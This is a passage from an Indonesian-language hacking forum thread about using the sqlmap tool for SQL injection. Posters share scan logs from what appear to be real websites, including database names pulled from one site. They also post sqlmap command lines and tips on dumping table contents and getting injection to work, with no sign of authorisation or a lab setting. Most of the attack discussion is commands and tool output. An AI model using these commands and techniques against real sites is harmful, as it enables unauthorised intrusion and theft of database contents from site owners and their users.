SQLi Sqlmap.py
#41
(01-29-2012, 08:10 PM)fadligore Wrote: Maaf nih mau nanya soal Sqlmap, kalo semisal udah ketemu semua tabel - tabel nya terus kita pengen download database atau isi dari tabel2 tersebut apa bisa tanpa harus mengetikkan perintah --dump ?

terimakasih sebelum nya

kayaknya kagak deh om,,dari yang dah pernah ane coba mesti dump dulu beru kelihatan tuh isi table

#42
(01-29-2012, 08:35 PM)junior.riau18 Wrote:
(01-29-2012, 08:10 PM)fadligore Wrote: Maaf nih mau nanya soal Sqlmap, kalo semisal udah ketemu semua tabel - tabel nya terus kita pengen download database atau isi dari tabel2 tersebut apa bisa tanpa harus mengetikkan perintah --dump ?

terimakasih sebelum nya

kayaknya kagak deh om,,dari yang dah pernah ane coba mesti dump dulu beru kelihatan tuh isi table

yup bener banget bro...trus log nya kan kesimpen di folder output Sqlmap.py nya, tak kirain ada perintah tersendiri buat langsung download isi database nya heheh maklum saya baca manual nya belum seberapa paham hehe , sekalian nanya lagi deh , kecepatan scan apa tergantung dari kecepatan koneksi kita juga ya? terkadang cepet tapi juga terkadang lambat, seperti contoh di bawah ini

[18:47:26] [INFO] retrieved: TABLE_TYPE
[18:55:18] [INFO] retrieved: ENGINE
[19:00:05] [INFO] retrieved: VERSION
[19:05:51] [INFO] retrieved: ROW_FORMAT
[19:12:58] [INFO] retrieved: TABLE_ROWS
[19:21:12] [INFO] retrieved: AVG_ROW_LENGTH
[19:30:31] [INFO] retrieved: DATA_LENGTH
[19:37:42] [INFO] retrieved: MAX_DATA_LENGTH
[19:47:33] [INFO] retrieved: INDEX_LENGTH


rentan waktu nya lumayan lama tp saya juga pernah dapet yang rentan waktu nya gak begitu lama, regrads Smile

#43
Thumbs Down 
Smilenice om..working ...mohon selalu pencerahan nya untuk saya yang baru bergabung...........salam..........

web application technology: Apache 1.3.42, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[14:40:51] [INFO] fetching database names
[14:40:51] [INFO] fetching number of databases
[14:40:52] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[14:40:52] [INFO] retrieved: 2
[14:41:09] [INFO] retrieved: information_schema
[14:46:06] [INFO] retrieved: stombic_db1
available databases [2]:
[*] information_schema
[*] stombic_db1

[14:49:21] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/teleconica.com'

[*] shutting down at: 14:49:21

we are not a security owner

..::BACKTRACK INDONESIA::..

#44
thanks Om,,,,tutor bermanfaatCool
cendol terkirimm,,,

#45
om kok ane ga mau muncul database nya ya
malah muncul seperti ni
mohon bantu kenapa yaa....

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 01:19:23

[01:19:23] [INFO] using '/pentest/database/sqlmap/output/www.lcoastpress.com/session' as session file
[01:19:23] [INFO] testing connection to the target url
[01:19:28] [INFO] heuristics detected web page charset 'ascii'
[01:19:28] [INFO] testing if the url is stable, wait a few seconds
[01:19:31] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [©ontinue/(s)tring/®egex/(q)uit] y
[01:19:37] [INFO] testing if GET parameter 'id' is dynamic
sqlmap got a 302 redirect to 'http://www.lcoastpress.com:80/index.php'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] y
[01:19:43] [INFO] heuristics detected web page charset 'ISO-8859-2'
[01:19:44] [INFO] confirming that GET parameter 'id' is dynamic
[01:19:47] [INFO] GET parameter 'id' is dynamic
[01:19:49] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[01:19:49] [INFO] testing sql injection on GET parameter 'id'
[01:19:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:20:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:20:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:20:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:20:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:20:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:21:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:21:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:22:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:24:19] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[01:24:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:25:29] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[01:25:29] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minutes and rerun without flag T in --technique option (e.g. --flush-session --technique=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2)
[01:26:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:26:44] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[01:27:16] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[01:27:19] [WARNING] false positive injection point detected
[01:27:19] [WARNING] GET parameter 'id' is not injectable
[01:27:19] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details

[*] shutting down at: 01:27:19

#46
maaf nih oot kalo blind sql-i sama sql injection sama atau berbeda ya??
<< back|track'ers newbee

#47
(03-11-2012, 10:19 AM)fake666 Wrote: maaf nih oot kalo blind sql-i sama sql injection sama atau berbeda ya??

ini ada artikel,,kalo pos dimari kepanjangan

http://en.wikipedia.org/wiki/SQL_injection

http://hakipedia.com/index.php/SQL_Injection

bisa dibaca Smile

mhaap cuma bisa bantuin nyari artikel saja

#48
(03-11-2012, 02:59 PM)syntax_error Wrote: Numpang Bacaa" aja bro Smile

Tapi mantab Tutor Nya Nice Share bro :*

om lepas tium sembarangan :p wkwkkw
salah sangkut ntar om hihihhi

#49
lah kok gagal mulu ya ==
gak ad database yang ke inject

[01:19:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:20:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:20:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:20:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:20:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:20:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:21:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:21:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:22:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:24:19] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[01:24:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

cuman gitu aja ==
eh bukan itu

tapi ini


18:46:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:46:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[18:46:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[18:46:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:46:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:47:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:47:03] [INFO] testing 'Oracle AND time-based blind'
[18:47:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:47:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:47:39] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
<< back|track'ers newbee

#50
(03-11-2012, 07:41 PM)fake666 Wrote: lah kok gagal mulu ya ==
gak ad database yang ke inject

[01:19:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:20:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:20:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:20:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:20:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:20:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:21:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:21:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:22:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:24:19] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[01:24:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

cuman gitu aja ==
eh bukan itu

tapi ini


18:46:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:46:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[18:46:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[18:46:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:46:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:47:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:47:03] [INFO] testing 'Oracle AND time-based blind'
[18:47:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:47:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:47:39] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS

syntaks nya apa aja??
seperti ini kah?
./sqlmap.py -u http://target.com/index.php?id=2

atau
./sqlmap.py -u http://target.com/index.php?id=2 --random-agent --threads 10 --banner

pakai yang mana??
ane sih pertama pake yang singkat,tapi keseringan gagal, g tau kenapa,,
terus lihat thread ny om syntax seperti cara yang kedua,,cukup enak ane ,dan sering berhasil ,,







Users browsing this thread: 2 Guest(s)